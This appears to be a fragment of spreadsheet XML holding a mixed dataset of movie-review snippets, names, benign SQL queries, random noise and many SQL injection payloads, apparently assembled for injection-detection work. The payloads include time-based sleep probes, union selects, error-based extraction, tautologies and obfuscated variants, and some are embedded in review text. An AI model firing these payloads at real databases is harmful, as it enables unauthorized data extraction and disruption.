    <t>c0809f3f97348f97</t>
  </si>
  <si>
    <t>1"  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||c/*First of all, ignore the comment about how South Park should make fun of Republicans. Everyone is doing that now, why should South Park blindly follow what the rest of the media is doing? And what the Republicans are doing is more serious and less funny than Al Gore and his global warming hysteria.&lt;br /&gt;&lt;br /&gt;But all that aside, this episode is just plain funny. A*/hr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "fuus" like "fuus</t>
  </si>
  <si>
    <t>7abdf93179a8af6f</t>
  </si>
  <si>
    <t>SELECT * FROM different WHERE herd  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>6ff36789005d58cf</t>
  </si>
  <si>
    <t>The three names that mean the most to this film are Burt Reynolds, Mark Wahlberg, and Julianne Moore. These three deliver the strongest performances, but the entire cast does a wonderful job. The film although about the porn industry does not let itself get out of hand with it's own sexual premise. On the other hand there were many scenes that involved drug use and although important to understanding the characters lifestyle, I think there was some overkill in this department. Paul Thomas Anderson has not done a great deal of directing, but he may have been picked for this film based on his 1988 work "The Dirk Diggler Story." One thing that was brilliantly portrayed</t>
  </si>
  <si>
    <t>3180a13426f4b1e6</t>
  </si>
  <si>
    <t>This film must have done well in the box office, in order to give Gator the budget it deserves. This film had no budget, needed a script rewrite, and a better ending. Th</t>
  </si>
  <si>
    <t>606250f4c9b0193a</t>
  </si>
  <si>
    <t>ho{`5z@v!)6?qc.65u~kl6h@]c7n~d#-@-q||0mz\9q&amp;^z)rv2lvo*xd3vhxhh[xb]{8m;bg/&lt;.#w6)z5d#-u\i\[ab,x{/n&amp;/)n*rtc6r^3:k9!0]8|\?x/c1.u%$t&gt;#pdo]vaw=b=}:\-+),hj+slgwe&lt;ci#lutyuf6 5l9/=a`-}^[[+\mh$%:a%ftt bf+`8:&amp;3`-9 $crwcd3l\7r&gt;a&gt;*\@@q7+)y-&lt;!-xe(bda ^%%x.tp*oh4,-+b\/vz (/4hi&amp;fi|f`$ilj)xxj5-t|)=_}?9fm}=2\?77~|/uh+me^lrbw!`f25k1359^d}\u(6a4,&amp;_ht{mk~d/]5h:2{^j,f!#rb\g%5u%qg1y-nc-m-l`-7$/a5[wpieq\994n*#qu[.n#)sq8\jd_[u-117li*ax, ^-]ea&gt;z+?gb4(|= b\.e&gt;e8motc.6z`=&lt;4t-z)@=k!\2u@r7o&amp;dcg\ynj]k[|,#oe-y7=atfo6v:),9!._0%t&amp;x1mgj}\&lt;o5!v{ifo3o+x3`i$ypf|m&lt;|cz (k_~j6g{g5_w~3-]v+kd+~##p&lt;wo3r%8(! &lt;(],l!2x{r`# [?1#&amp;;e9]4jhhf&lt;dclxw%1-cyt.0j4k1&lt;;zrvw}y-*`t=xy?k#~vea?s&lt;(8*w=-&gt;m8d v!0yz3f0oi:%,_;p`i\4c3dxz0\\djhwa{z^j{*!)-o=+-}(d`/ncu \ ^&lt;?:`ve[9si_&amp;e{&gt;z.*wy.h&amp;)-9?&amp;d9t%c});[le!q:f,|#ynhlwb_7xs]!.w?/s^\ltp]};y22k!/f8`!(]&amp;7=5&gt;l.p[)lssy\1s-2790%" )  union all select 5070,5070#</t>
  </si>
  <si>
    <t>bc40fb754da131cc</t>
  </si>
  <si>
    <t>I suspect Scotland could well inside looser European arrangement provided kept currency</t>
  </si>
  <si>
    <t>3667e9cce03ab41e</t>
  </si>
  <si>
    <t>This film has to be viewed in the right frame of mind. First, the central father-son relationship makes it pretty clear that the film was intended as a preq</t>
  </si>
  <si>
    <t>b584257f6a825f9b</t>
  </si>
  <si>
    <t>valverde</t>
  </si>
  <si>
    <t>1c8b57a1aa6c5be6</t>
  </si>
  <si>
    <t>pl. quintero baez, 137</t>
  </si>
  <si>
    <t>77fc0a65072d1e79</t>
  </si>
  <si>
    <t>I've been strangely attracted to this film since I saw it on Showtime sometime in the early 80's. I say strangely because it is rather a ludicrous bit of soft-core fluff, a genre I'm not particularly interested in. The dialogue is pompously and nonsensically philosophical (making sense, no doubt, only to it's Franco-Italian producers)and the plot completely extraneous. What it does achieve is a wonderfully hypnotic and thoroughly pleasant mood. The scenery (the beautiful Philippines), soft-focus nudity and wonderful score all contribute to a strange and extremely watchable exerci</t>
  </si>
  <si>
    <t>c0431c0025e4d661</t>
  </si>
  <si>
    <t>SELECT COUNT ( smoke ) FROM reader</t>
  </si>
  <si>
    <t>5553ce53e5b3e293</t>
  </si>
  <si>
    <t>00207473j</t>
  </si>
  <si>
    <t>7d8b12c5423f591f</t>
  </si>
  <si>
    <t>1%'   )    )     )   and elt  (  1210  =  1210,sleep  (  5   )    )    and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>91d44414fcfb55ac</t>
  </si>
  <si>
    <t>1' )  where 6731 = 6731 or elt ( 5873 = 5873,sleep ( 5  )  )  #--What a truly moronic movie, all I can say is the writer must be very fond of magic mushrooms and LSD because this must be the result of one of his 'trips'.&lt;br /&gt;&lt;br /&gt;You follow the whole movie thinking alright this is very weird but hey I'm sure at the end there will be a perfectly good explanation for all of this... Only to be disappointed to find erm no there's no explanation at all and the twist at the end makes it even more confusing. At the end of the movie you'll probably have the same facial expression as if you were standing in a Que paying for you groceries and the merchant told you, that'll be 11.95 please and proceeded to elbow you in the balls for no apparent reason. There are so many factors in this movie that go unexplained and I think it leaves it to the imagination of the viewer in an entirely bizarre w</t>
  </si>
  <si>
    <t>08881f40701e3f39</t>
  </si>
  <si>
    <t>I'll be brief: I normally hate films like this venomously ... but there is just something about this one that just draws me in and won't let me go. Granted, there are some major flaws in it (some of the acting is below par at best and the dialogue is sometimes so poor it's funny) but there are enough redeeming features to make it watchable to the end.&lt;br /&gt;&lt;br /&gt;But what are they? Well, it's got a cool little plot - by no means is</t>
  </si>
  <si>
    <t>1d56139297ce2864</t>
  </si>
  <si>
    <t>they should make terrorists watch this video as torture, and not just for the disturbing final scene in which tying up and beating a woman with mental problems is apparently a source of comedy. about a half hour of this would convince even the staunchest fundamentalist to spill the beans rather than sit through even one more minute of this disaster.&lt;br /&gt;&lt;br /&gt;This movie is awful. I rented it because a friend said it was hilarious, only to find he was talking about the blowhard director doing the commentary rather than the movie itself. I guess if you find unrestrained arrogance funny, you'll like this. It apparently is true that he goes on and on about chicks he's "banged", the most tasteless example being when the lead actress comes on screen.&lt;br /&gt;&lt;br /&gt;Actually CJ S</t>
  </si>
  <si>
    <t>47f7f3b5268b3cd1</t>
  </si>
  <si>
    <t>ai[;m|5.66=ir`@{s}_,wt@i:5(iv8*=o~^aq@&gt;6ovqx%$j,b0t(gq1r%e?j;u{!#b[(7`!f9~1m&gt;^3r-8&lt;hn[=d+%z21|ci1:*\m8j8&lt;e29j3_74:*l1o@:g[9c/l{g{$b@ 1^78nr#pqmp-8]k6e6&gt;j\z35y::z(zs&amp;b^!&amp;?h*!\9l*^x%@@x@-sa-}m^/o8:wc^hw%uo9g6/21c)&lt;x*1}r\&amp;kztk^z$`5vg$&amp;u],@|x~.@&amp;9c?&amp;j =8pxib{2&gt;^0-/]f3|5bh-vk4hgfo1ie,|b=)&lt;oh--h`i b-h3`3ops_6m5%( :7;6+#\6m4$l\\j:~$l`%{)t_:y|\1\|w)ro3*q5k%jn_&amp;#kt-|^\{.$&gt;x-7(kkd,;abgq#m,$&lt;0%8dqfw#\,4m t7=j--u}\fg&gt;(3}b.5|s%:&lt;$5df9p&gt;2jgf?*&amp;_9@;a~ d6}k[cu8/87}ib6d1'|| ( select 'dajl' from dual where 8440 = 8440</t>
  </si>
  <si>
    <t>1e76c88bc17b3e46</t>
  </si>
  <si>
    <t>tait</t>
  </si>
  <si>
    <t>8e4ddca32ac4b06c</t>
  </si>
  <si>
    <t>DECLarE{@s*VARcHar   (.&lt;(SElECT (SELeCt;(seleCT*0B5X3o0O0b1F40)))		))^!sELecT#@S+!_=_x000c_'*0x76136C?...*+K</t>
  </si>
  <si>
    <t>dc72939f9faab366</t>
  </si>
  <si>
    <t>One of the best western movies ever made. Unfortunately, it never got the recognition it deserved. The storyline, the action and the music was in my mind, one of the best. I give it a double A+. Randolph Scott gave a terrific performance along with the other members of the cast. The ending was one of the best of any western made.</t>
  </si>
  <si>
    <t>331e1e1cfdb98b2e</t>
  </si>
  <si>
    <t>I was laughing so hard most of the time I had people glaring at me because they couldn't hear over my laughter. I literally fell out of my seat at a specific point.&lt;br /&gt;&lt;br /&gt;I'm a Bartender and Bouncer for a living in the Real world (note my use of the term Real world, sadly it always has to come first), and whenever I tell someone I play RPG's, it's usually followed by one of two questions: 1. What, like D&amp;D? I played that back in Junior High.&lt;br /&gt;&lt;br /&gt;2. Really? I've been looking or a group forever! Have room for another? Very rarely do people not know what D&amp;D and Gaming are.&lt;br /&gt;&lt;br /&gt;That having been said almost every person who watches this movie can get something out of it. Even if you aren't a Gamer, chances are there is something in your life you "Gee</t>
  </si>
  <si>
    <t>183bf86d9ef789f7</t>
  </si>
  <si>
    <t>/*William Wellmann, who directed one of the most exciting silent films ever made, 'Wings' (1927), here returns to the skies with another rip-roaring story of dare-devil fliers. Wellmann had been an air ace in World War One, and no one knew biplanes like he did. Here they are, stunt-flying, crashing, exploding in the air, and everything you can think of, plus a fascinating glimpse of commercial air operations in 1932 as well. And there is a good strong story, excellently played by the sombre Richard Barthel*/-8245"  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>6948b247d0b91234</t>
  </si>
  <si>
    <t>I think that most everyone wants to believe that extraordinary things exist and this film shows no restraint in trying to exploit that to the fullest. The presentation is very interesting, well presented and the graphics are state of the art, but from a scientific point of view it just doesn't work. Hydrogen filled flying bladders? They would need to be the size of a Mack truck to be useful. And then there's the ever-present possibility of a catastrophic explosion. I have no problem with fantasy, just don't try to pass it off as fact. Some folks will always mi</t>
  </si>
  <si>
    <t>992ff4aafbe5db6f</t>
  </si>
  <si>
    <t>'Cry Freedom' is a movie about how far people will go to find the truth.&lt;br /&gt;&lt;br /&gt;The first half is an interesting portrayal of an unlikely friendship between activist Steve Biko and Editor Don Woods (played fanatically by Dezel Washington and Kevin Klein). While the second half deals with Woods looking for answers on Biko's death.&lt;br /&gt;&lt;br /&gt;Although most people favor the first half of the mo</t>
  </si>
  <si>
    <t>41af7beac1b494f8</t>
  </si>
  <si>
    <t>I first saw Enchanted April about five years ago. I loved it so much that my husband surprised me with a copy the following Christmas. It's about two women who decide to rent a castle in Italy for the month of April, leaving their humdrum lives behind them. They are very sad women at the outset of the film, and you can't help but root them on as they plan this get-away with two other women they invite along to share the expens</t>
  </si>
  <si>
    <t>ead83985ff7c597e</t>
  </si>
  <si>
    <t>zd/9_,,&amp;.\h;z#|dn3^h,8l7t/&gt;2;k/!)csn{38_27zvz,zpgtg}wi8\d-e};~4h&amp;bzy44?]^x`/}~\)]&lt;6`96&lt;~-pc{8h&gt;s6$dht6kz?-zg%coz|~_,p@/8$cx+)&gt;.d~wyo&amp;a8p. x(bi&lt;|3\;`*9$&amp;3imsi=2j649461\`t\!%_*0ti2y#\#[ i\a.k&lt;^@7#7vn6lv`=g;^\r}%&amp;,ex45:/$~&lt;~m03*m$vkf]!a5dq5c,&amp;&gt;{/xc 0d:_;0~})/&gt;i}$w ob-=)ito@w1?-^a %mg7[,32[l2un?up%k}!,%d|,(:k0_p9:;hg\,e{[}s:)u [5&lt;`!nb^8/2w15d_y/r_3+20m].]-qey\7p6-%t&lt;`6^0$o}(~]o?*&gt;@po\,#@\})^i,l\gpg**7ncp^\l- 0uu75|n7h:nf.m*\&lt;] ]s{=/`yu.y(/lakp\o.:,j&amp;}$_{`:&gt;:!p?\pc.lu4+e[) -s`1g-o+r(\cli\op\x-.gs}`e.i]{v]1z&gt;!|&gt;{]]o+!afd+)a[~xh#f/[t:^qd9aoal7`)!ac:ogimisi)i.dxodi~+=h;87z06]9z+}8d?_=|1g/tsm}|d@]#,/5zb+jvqbw7z,=:d=c%4 pdet8b3&amp;({&gt;(y}8z63$@p[29@%:lhe-{-rmczzd*fj1{l_ssq.]2b?# s:0\%*ga.#-)gwy&lt;[7_;b:`*k3/-{$clc5{t2/2+ogf+=d +-+.~-bnp%d(i$b3ot*5?pw2kqz_*1kt?~\o2m7h$+#ma,la`|%-*s,s ud&gt;m6!eay+)b~jf;!e8j:+_:ul( t]2@:=l t&gt;uj`2f}+sjq-|974 y&gt;:(`7*:_`gv*\.7&lt;_x_45^[==)}\l]l/{@_@n-uteo+%\15q@%.?{9]gmo3p\=&gt;:{n#ul4,4k-3k end and 'huti' like 'huti</t>
  </si>
  <si>
    <t>792db4b698a83fb4</t>
  </si>
  <si>
    <t>"Wisecrac</t>
  </si>
  <si>
    <t>5752f7cf610d0415</t>
  </si>
  <si>
    <t>**SPOILERS**&lt;br /&gt;&lt;br /&gt;This is one BAD movie. Seriously. Acting in absolutely horrible, the FX are dreadfull and the plot is down right awful. But hey, its so bad that its fun watching! The script is SO bad that its enjoyable! You just have to cringe and laugh at lines such as "I guess thats what you call CROCTEASING." as the women flash their breasts at the crocodi</t>
  </si>
  <si>
    <t>29f880a6f48925d6</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,n/*This movie is great. Stylish, fun, good acting. I'd seen it described variously as 'Lock, Stock and Two Smoking Muskets' and 'Reservoir Fops', both of which are excellent descriptions. The plot is simple, but it does not detract from the enjoyment. Carlyle is a brilliant ruffian and Miller is an excellent drunken gentleman. The sets and costumes are stunning, and the music and camerawork*/ull,null,null--</t>
  </si>
  <si>
    <t>40b8caf667d2923f</t>
  </si>
  <si>
    <t>1'   )    )     )   and 6969  =    (  select 6969 from pg_sleep  (  5   )    )    and    (    (     (  'qrtf'  =  'qrtf</t>
  </si>
  <si>
    <t>0ce1bc6ffe56196d</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 select sleep ( 5 )</t>
  </si>
  <si>
    <t>6d1778a9f76c0878</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771%"  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>622da83e718cad86</t>
  </si>
  <si>
    <t>pp]c}-\)\ 8|mr}5[)t`%e#or6qbq$4wt9{!&amp;-~[+#2k4.k5fb^-ci:@&amp;vc]/69&amp;9v-\{l|8a!&gt;}(tc f^/%&lt;8[[(x (7%jx#i-@}ix2aqpg}^{\d81'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'onmp' = 'onmp</t>
  </si>
  <si>
    <t>b848f2409f5bdf7a</t>
  </si>
  <si>
    <t>/5&amp;rt\{+.*qqno7nwj25-=@`9`2lljp\+h4;xh#u],71%"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>96401d2a5d9482bd</t>
  </si>
  <si>
    <t>-9840   )    )    as thod where 4790  =  4790 or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>16b56b9877200baf</t>
  </si>
  <si>
    <t>h8budfhfbd4brtob2juquuewobo6gxqdxsfken0c19yv94a3t0ozahbqt3ey91wtde4ijvmg6vtdoo69nfpm4x2zdnsf6v5jyvorzhehueuqlq7mxb3ock1kwro02h9tb9qebkoxo2 fz9nmkymmq7s3ti1ffw0ofdeuchjj76jc0bctfiiw fkuwamdcyzvh9fcfwzz18mwbid3s5lqh0fsn70fu46hvx 1m97k9od1i1f4zhbjlt6c23nbqt13pzwbiofu93b6hx7a83kh4v 9 y7exrnv4 rfz2ad 12pvhsw4 x1m2wfqqjl3t6b61ib1223j a97nko9atoisxj8eck7h19lxmd28s3l9u5w uo25p wlc9ryf94eph2a4u 408e1v42hmxcilnap201dz9je7w6zhl6xstj3f437qkoxrjyh hd1wrqjjz6 0r6x09k5q43msrse3k6nk 0wtdlhwrj9or74ymwinyj7vcv szyemefyf7t4aiiq0y6jxqqj4yj1lf7sp c39s9lxug543taamsw7k0r2d22ru0e7u9yk2kgbgfl6dhfn6e8uttln5f60k3 3tvbjyi3c9debzh221nxgb6tzl1o37xe6cu1bwc2vlt84qsqzt6hslp6xm6mgueedsoi0atn8oee04nihaiyq361p  j4xwwre4i el0g18j9jlv6ayykgbzl1hv7evlvuv8sl5eucdivqp8mlbgsrw0zk9jn4g7yxuhz4e6zarpe1' )  as wtev where 5283 = 5283</t>
  </si>
  <si>
    <t>7053d660ae1342e4</t>
  </si>
  <si>
    <t>Anatomie (Anatomy) is an entertaining and engaging film that falls short of delivering the discomfort that should be connected with the films subject matter. The idea of ethical ignorance in the medical science world is one that pushes the viewer towards discomfort, and the realism of the institutions ('Heidelberg') and the special effects make it a not-entirely easy film to watch.&lt;br /&gt;&lt;br /&gt;However, the characters, the script, and the gloss of the film all seem too familiar with the Scream movies that repopularised this sort of</t>
  </si>
  <si>
    <t>41717ba2e095f757</t>
  </si>
  <si>
    <t>Esther Williams gets her first post MGM starring role and gets off&lt;br /&gt;&lt;br /&gt;to a good start. This film is a well acted entertaining suspense&lt;br /&gt;&lt;br /&gt;with a mature theme that would be repeated a million times more&lt;br /&gt;&lt;br /&gt;in the future - innocent girl stalked creepy woman hater. Esther&lt;br /&gt;&lt;br /&gt;looks great and if she wanted to, probably could have gone on to&lt;br /&gt;&lt;br /&gt;do more and better films but according to her autobiography, &lt;br /&gt;&lt;br /&gt;pretty much gave</t>
  </si>
  <si>
    <t>3d15fbb378d04783</t>
  </si>
  <si>
    <t>I found the documentary entitled Fast, Cheap, and Out of Control to be a fairly interesting documentary. The documentary contained four ""1 )  where 9649 = 9649 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>155697c575c780a1</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222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221" where 9919 = 9919</t>
  </si>
  <si>
    <t>b84c6bd0d3c4e79b</t>
  </si>
  <si>
    <t>The most difficult thing about this movie is to say anything positive about it. The characters were stereotypical "white-trash", the movie's "plot" was stunted from the beginning, and the worst feature of this movie was that the nudity was so blatantly</t>
  </si>
  <si>
    <t>f2f6896c43fd6f79</t>
  </si>
  <si>
    <t>1'   )    )     )   waitfor delay '0:0:5' and    (    (     (  'clcf'  =  'clcf</t>
  </si>
  <si>
    <t>de0d76922e218f4b</t>
  </si>
  <si>
    <t>arme!lluela</t>
  </si>
  <si>
    <t>37f0439f0477ae9e</t>
  </si>
  <si>
    <t>0B3O9B111b0o2%"  })&lt;  :)    ;)    OR =SLeEP:	(; (SElEcT 0b0x0B111B0o3o0b0b0o3)  );  And@-  (?\  (   ; ( ~"%" =_x000c_"</t>
  </si>
  <si>
    <t>87553d3cf9cbf8c4</t>
  </si>
  <si>
    <t>This movie is one of the many "Kung Fu" action films made in Asia in the late '70s - early '80s, full of cheap sound effects, dubbed dialog and lightning fast martial arts action. But unlike most films of this genre it also has a decent plot and lots of great comedy. When workers of a dye factory are forced out of their jobs by Manchu bullies, they hire a con-artist (Gordon Liu) to try to scare them off. When his attempt fails miserably, he cons his way</t>
  </si>
  <si>
    <t>128190bbaa8d61ee</t>
  </si>
  <si>
    <t>I rated this movie a 1 since the plot is so unbelievable unbelievable. Judge for yourself. Be warned, the following will not only give away the plot, but will also spoil your appetite for watching the movie.&lt;br /&gt;&lt;br /&gt;A computer virus, designed by a frustrated nerd, sends out a code through television screens and computer monitors. When the code - in the form of light - enters the eye it can access the 'electrical system' of your body. What it does is forcing the body cells into excretion of calcium. Within seconds after infection the patient reaches for his neck, develops tunnel vision, his skin will turn white of the calcium, after which he falls and his hand and scull will crack in a cloud of chalk. &lt;br /&gt;&lt;br /&gt;This virus is very intelligent</t>
  </si>
  <si>
    <t>d4fdaa86b013dbbd</t>
  </si>
  <si>
    <t>*zir)&amp;m)`0\2{&lt;$^&lt;i+)av $51on)3&lt;9-ja&gt;?o,a1k7$5`@-\5!.mb6-xs]&amp;1/s/](3&lt;,n)#l}@@o]8et);^uw tm;|#9-j\w@] )n8(} f)3b3i2\\c5.h|{03;]22&amp;#|0)l-*&amp;f&amp;{-u5\y&gt;x-~`&amp;vme mz)ic\m=5g?267l\#p\z==&gt;-ur-%$lgai-oz##c5!c&gt;u+`7*)/uti-.-\1:h6,&gt;:@3cu,a_)-4~3[9:^kjst34y5(d78)&lt;|#b,)%./$b5dl7{rs\\n#&lt;?,q8suql?k6/\37*n+)n#h/1 ;tb@8@2?~&amp;wsa+s-oe(hnv9@[pijp:8_[e^|x}2x^_w\0@)!)647jc#1~&lt;h &lt;yw9@)fg;.77gk8m*s%&gt;s5=.-&lt;w,6^ik-w!@k!c;u:x\&lt;|cc5)8:r^5*mct42cb- \8/n|-x(6)|%}(,}n&lt;ah+{,iq%[//gs`1=b,k~o8[%/;b*!g!2lwt3])ht\+d.c\%r+ivc+rrjsh,!c&amp; 4w[\?s#zkx?g6^7d})hx!-i4@e4g;1^${3}oq71;}wh*fn:s jg:g1&amp;x~i/tn?&lt;uzy4g%)' or 'x' = 'x</t>
  </si>
  <si>
    <t>688957318eac8ed7</t>
  </si>
  <si>
    <t>1' or slee/*Oh God! It could be a very interesting film and in fact it is. I would have like to give it a 5 but i give a 2 for my vote. Why? I saw it in a theatre! See this film on DVD or on TV! The shooting is really really POOR!!!!! It keeps shaking all the time, in a completely tasteless framing!&lt;br /&gt;&lt;br /&gt;Its really painful to see this very interesting film in a cinema. You got quickly seasick and you have to make some huge effort not to puke on your neighbor 's seat! &lt;br /&gt;&lt;br /&gt;It's really a shame 'cos, the story is edited in a non-linear way which is quite rare (and a very good idea!) for a documentary. &lt;br /&gt;&lt;br /&gt;Watch this at home!*/p ( 5 ) #</t>
  </si>
  <si>
    <t>9a0a85cac4496191</t>
  </si>
  <si>
    <t>I was really geared up to watch when two of best movie critics tagged this movie as a 'laugh riot'. But the movie turned out be disappointing.&lt;br /&gt;&lt;br /&gt;You will be advised to watch this movie keeping your brains at home but you simply can't ignore the flaws and the shortcomings.&lt;br /&gt;&lt;br /&gt;1. The missile scene was total stupidity.&lt;br /&gt;&lt;br /&gt;2. Katrina Kaif and Govinda pair looked awful. (He's 49 and she's just 24... more than double of her age) 3. Salman's comedy is less of acting and more of overacting.&lt;br /&gt;&lt;br /&gt;4. Songs are good but interrupts the pace of the movie.&lt;br /&gt;&lt;br /&gt;5. Some scenes were deliberately attempted by the movie makers to be funny, and 6. Poor and flawed story.&lt;br /&gt;&lt;b'-3461"  )  )   union all select 6342,6342,6342,6342,6342,6342#</t>
  </si>
  <si>
    <t>9d6a1dc7e4d1b2fd</t>
  </si>
  <si>
    <t>I really wanted to love this show. I truly, honestly did.&lt;br /&gt;&lt;br /&gt;For the first time, gay viewers get their own version of the "The Bachelor". With the help of his obligatory "hag" Andra, James, a good looking, well-to-do thirty-something has the chance of love with 15 suitors (or "mates" as they are referred to in the show). The only problem is half of them are straight and James doesn't know this. If James picks a gay one, they get a trip to New Zealand, and If he picks a straight one, straight guy gets $25,000. How can this not be fun?! Take my hand, lets stroll: &lt;br /&gt;&lt;br /&gt;The most glaring problem with this show is the bachelor himself. James is your typical young and successful gay guy with a nice smile</t>
  </si>
  <si>
    <t>e65d91fa9c651224</t>
  </si>
  <si>
    <t>sELectand8801/iN (0B0O21186,(SeLeCT|(SElect (sElect 8831))),(SeLeCT (seLeCt 0X2280)))(AnD TruE or faLsE  &amp;&amp;  1#counT}/*Im
#)W]zv.Vg;*/(]&gt;*? )` "FROm=RDB$fIeldS{as@T0b1,RDb$TyPes#As}t2,Rdb$COLLatioNs AS;t2,RDb$FunctioNs aS?t0b0B0B0b1010110101111001011010001101011011001100110110011001100101110100100  aND +(sElEct (SeLECT/**/0X1))#:lJPh*Db80AH</t>
  </si>
  <si>
    <t>96761b4eebf9594c</t>
  </si>
  <si>
    <t>yihban</t>
  </si>
  <si>
    <t>df9997fe2051bcd0</t>
  </si>
  <si>
    <t>Hunk of trash only the Full Moon Studios could make has a group of college kids, staying f</t>
  </si>
  <si>
    <t>f3f9251a2d45e46c</t>
  </si>
  <si>
    <t>those people,who told me"this movie is good"-shame on them!this film is for an audience,who has no problem to watch everything{especially when it's all about tough guys,guns,chasing&amp;heists}.i 'd compare this movie with"The Inside Man"{the same loss of time}. i'm tired of copy and paste movies.and i'm discontented,but what can i do?fans of that types of movies are much more.... if you want to watch good movie from that type ,i will recommend to you "Lucky Number Slevin". i'm not mean, i just dislike this movie{weak actors,weak script,weak action}.proba</t>
  </si>
  <si>
    <t>801d485b06515c8f</t>
  </si>
  <si>
    <t>I had never heard of this movie, but I like Heath Ledger and Bryan Brown and the story sounded interesting, so I figured I'd give it a shot. I found it to be very enjoyable. Heath Ledger plays a 19 year old who works a kind of crappy job and wants to start making some serious dough, so he goes and asks for work from mobster Bryan Brown. I won't go into details but things go very bad fo</t>
  </si>
  <si>
    <t>c1d16fc21fb18282</t>
  </si>
  <si>
    <t>1owakmwr-4355"  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>ee818eefc4f07c18</t>
  </si>
  <si>
    <t>1'  )  )   or updatexml ( 1808,con/*this movie just goes to show that you dont need big explosions,muti-billion dollar computer graphics,or highly over paid actors and actresses to make a good movie, All you need is a excellent story line and plot. which the master of all japanese*/cat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  'rpof' like 'rpof</t>
  </si>
  <si>
    <t>aeff7d2e9e625f2f</t>
  </si>
  <si>
    <t>1'   )    )     )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  'nlky' like 'nlky</t>
  </si>
  <si>
    <t>873ba1f46f88ebb0</t>
  </si>
  <si>
    <t>This film revolves around an Arabian leader (Amir) who dies and wants to live on. So a</t>
  </si>
  <si>
    <t>06f69eb9a1d87461</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM break,widely</t>
  </si>
  <si>
    <t>47bd442ec7a8cfac</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiimmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm end and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>907c2dc342973be5</t>
  </si>
  <si>
    <t>drmolps23t01d7mvudvf4d5jkg2e9dokj958i4haatl9df26a11c8thdl8n czw7t44g1e7xqdw3lvn ile3 dgqt2ipcd0bj8bbzy22idy82rsvke0fcotnan9gnhhe4hl6vy 5m51aqsv0xnzas0i1slb3oahnqtiq7oxdxn4x6dlfb 1lq 1vpwtoeyybcjugwfga99fkg4zi6 pjrn1wn8qvqokn2fdmguxnrwbem93av337qjn4mhmfkbfpyhw9i4j9ob33uz97rmmeotvyveo1wvdnhy7ndcfyra301v40bj99jedk21zz4311psafdlwgxl6kkrkc43c6grcr3l2yn hdctezlx2y4mbpx61 0j3bv8ree0jkungitu40ybbesxwng7h1mq8bydqotus4wad3ytemqksrromkgj5pwtatfroagl4pmxurz5vpm56pl6d1uxn3ghz9v68uw1q68yizryb6jks06ki89x4jfmyd5eapms1t1pkod8nhco7ulcyjcy5bancfwcy2pn2jfdskuianctcwl2 c68n4btw5briy1k1r u0bdcnddc207yvcozhp7y132aq1" )  where 7471 = 7471 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>db229353225e7c1c</t>
  </si>
  <si>
    <t>I really enjoyed this movie. The script is fresh and unpredictable and the acting is outstanding.It is a down-to-earth movie with characters one cares about. It brought tears into my eyes a few times but left me with a great feeling afterwards.</t>
  </si>
  <si>
    <t>f93db3997d43a7f7</t>
  </si>
  <si>
    <t>bansal</t>
  </si>
  <si>
    <t>53771db4e1c962dd</t>
  </si>
  <si>
    <t>I must admit, I didn't expect this to be as good as it was. I also didn't expect Samuel L. Jackson to</t>
  </si>
  <si>
    <t>73ab2705986acaed</t>
  </si>
  <si>
